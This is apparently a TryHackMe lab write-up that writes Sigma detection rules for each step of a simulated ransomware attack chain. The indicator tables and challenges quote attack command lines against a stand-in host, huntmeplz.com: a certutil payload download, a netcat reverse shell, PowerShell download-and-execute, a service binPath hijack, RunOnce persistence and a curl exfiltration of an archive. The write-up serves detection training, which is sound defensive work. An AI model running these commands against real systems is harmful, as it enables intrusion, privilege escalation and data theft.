TryHackMe SigHunter WriteUp
Initial Information
- 1st week of work, ransomware incident concluded
- Threat mitigated successfully by Incident Responders
Attack Chain
- Execution of malicious HTML Application (HTA) payload from a phishing link.
- Execution of Certutil tool to download Netcat binary.
- Netcat execution to establish a reverse shell.
- Enumeration of privilege escalation vectors through PowerUp.ps1
- Abused service modification privileges to achieve System privileges.
- Collected sensitive data by archiving via 7-zip.
- Exfiltrated sensitive data through cURL binary.
- Executed ransomware with huntme as the file extension.
Attack Technique | Indicators of Compromise |
HTA payload | Parent Image: chrome.exe Image: mshta.exe Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta |
Certutil Download | Image: certutil.exe Command Line: certutil -urlcache -split -f http://huntmeplz.com/ransom.exe ransom.exe |
Netcat Reverse Shell | Image: nc.exe Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38 |
PowerUp Enumeration | Image: powershell.exe Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;" |
Service Binary Modification | Image: sc.exe Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe" |
RunOnce Persistence | Image: reg.exe Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe" |
7-zip Collection | Image: 7z.exe Command Line: 7z a exfil.zip * -p |
cURL Exfiltration | Image: curl.exe Command Line: curl -d @exfil.zip http://huntmeplz.com:8080/ |
Ransomware File Encryption | Image: ransom.exe Target Filename: *.huntme |
Attack Technique | Required Detection Fields |
HTA payload | - EventID - ParentImage - Image |
Certutil Download | - EventID - Image - CommandLine |
Netcat Reverse Shell | - EventID - Image - CommandLine - Hashes |
PowerUp Enumeration | - EventID - Image - CommandLine |
Service Binary Modification | - EventID - Image - CommandLine |
RunOnce Persistence | - EventID - Image - CommandLine |
7-zip Collection | - EventID - Image - CommandLine |
cURL Exfiltration | - EventID - Image - CommandLine |
Ransomware File Encryption | - EventID - TargetFilename |
For the following challenges we will only display the code that is relevant to our changes. |
Challenge #1
We have been informed that the Image is: mshta.exe
The ParentImage is: chrome.exe
and that we also need to pull against the EventID
To do this we can easily use contains as our goto like so
detection:
selection:
Image|contains: 'mshta.exe' #Checks image field for the program mshta.exe
ParentImage|contains: 'chrome.exe' #Checks the ParentImage field for chrome.exe
condition: selection
fields: EventID #Will pull the EventID field with the rule
Challenge #2
Up next we will again focus on detection and fields. In this case we know the following:
- Image: Certutil.exe
- Command Line requirements
- certutil
- -urlcache #Forces certutil to ignore the currently existing cache and grab a new copy of the file
- -split #Splits embedded ASN.1 elements and saves to files allowing for the capture of embedded malicious payloads
- -f #Specifies the url and the file name to download
To write our required sigma rules we will do the following:
detection:
selection:
Image|contains: 'certutil.exe'
CommandLine|contains|all:
- 'certutil'
- '-urlcache'
- '-split'
- '-f'
condition: selection
fields: EventID
Challenge #3
Repetitive I know, but this is what we're looking for, the NetCat reverse Shell
We know the following:
- Image: nc.exe
- CommandLine: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
- Hashes: MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38
We need to remember that we are checking for the -e filter on nc.exe, however, due to the file possibly having entered via a different route we want to set that apart as a separate selection.
See the code below:
detection:
selectionNC: #checks for netcat runing a
EventID: 1 #Checks for event type 1
Image|contains: '\nc.exe' #Search identifiers for the detection. Refer to the required fields provided in the task. #Checks to see if the process being run is nc.exe
CommandLine|contains: ' -e ' #Checks to see if netcat attempts to execute a file or application after running, if this is a true positive this will pass a command prompt to the attacker
selectionHASH: #specify that we want to search for this hash as any file associated with this will be the ransomware that was originally found
Hashes|contains: '523613A7B9DFA398CBD5EBD2DD0F4F38'
condition: selectionNC or selectionHASH #ensures that our rule triggers on either the HASH or the nc.exe -e event
Challenge #4
PowerUp Enumeration begins running a PowerShell privilege escalation enumeration script.
We are provided the following knowledge for this:
EventID: 1
Image: powershell.exe
Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"
detection:
selection:
EventID: 1 # Ensure that Event Type is 1
Image|endswith: powershell.exe #Search for powershell being run.
CommandLine|contains|all:
- 'iex' #Checks for invoke expression, this allows running of commands and expressions on the local computer
- 'downloadstring' #This will allow donwloading a file or script which from the previous iex will run it
- 'Invoke-AllChecks' #This means that they will use all modules for checking
- 'PowerUp' #A script that is used to enumerate different privilege escalations.
condition: selection #Use the previously created selection
Challenge #5
Service Binary Modification allows for a service with too high of privileges to provide access to System Privileges
What we know:
EventID: 1
Image: sc.exe
Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"
detection:
selection:
EventID: 1 #Ensure that Event Type is 1
Image|endswith: 'sc.exe' #The application running in the Service Control
CommandLine|contains|all:
- 'sc.exe' #The application being called is Service Control
- ' -e ' #This is the exection command that is passed along.
- ' config ' #Modifies the value of a service's entries
- ' binPath= '
condition: selection #Sets the previous services config's bin path to the malicious script
Chapter #6
RunOnce Persistence this allows an attacker to setup persistence into the system and/or network.
What we know:
EventID: 1
Image: reg.exe
Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"
detection:
selection:
EventID: 1 #Ensure that Event Type is 1.
Image|endswith: 'reg.exe' #The Registry editor is being run.
CommandLine|contains|all:
- " add " #This command will add a new registry key/value to the registry
- "RunOnce" #Looks for the RunOnce which will run a program when a computer logs in.
condition: selection #chooes the previous listed selection: option as the detection rules to look for
Challenge #7
7-Zip collection is used to begin the exfiltration process where they will be collecting data.
What we have:
- EventID: 1
- Image: 7z.exe
- Command Line: 7z a exfil.zip * -p
detection:
selection:
EventID: 1 #Ensure that Event Type is 1.
Image|endswith: 7z.exe #We're looking for the 7zip process that will be used to archive and compress the data
CommandLine|contains|all:
- ' a ' # This flag will archive the data that is entered further in the command
- ' * ' #This states to select all files
- '.zip' #We can see that this is a compressed zip archive at this point
- ' -p' #Sets a password, in this case most likely blank, on the archive
condition: selection
Challenge #8
cURL Exfiltration this is the extraction step that takes place after the archiving of the data. We will need to look for the push of the file up to a website
What we have for information:
EventID: 1
Image: curl.exe
CommandLine: curl -d @exfil.zip http://huntmeplz.com:8080/
detection:
selection:
EventID: 1 #Ensure that Event Type is 1.
Image|endswith: curl.exe #checks for the cURL command line application
CommandLine|contains|all:
- 'curl ' #reviews the command line for the curl command
- ' -d ' # checks the curl for the -d flag which will send data in a post format, can be used to move exfiltrated to a specific website
- ' @' # FOllowing the -d flag this will specify the filename that is going to be sent to the website
- '.zip ' # After reviewing all the other portions if they are all seen then we will see if the file is an archive.
condition: selection #Action to be taken. Can use condition operators such as OR, AND, NOT,
Challenge #9
Ransomware file encryption step will encrypt all files on the system and rename them to have the extension .huntme
What we know:
EventID: 11
TargetFilename: *.huntme
detection:
selection:
EventID: 11 #Checks if the event type is 11
TargetFilename|endswith: '.huntme' #Looks for files that have ben renamed by the program to end with the extension .huntme
condition: selection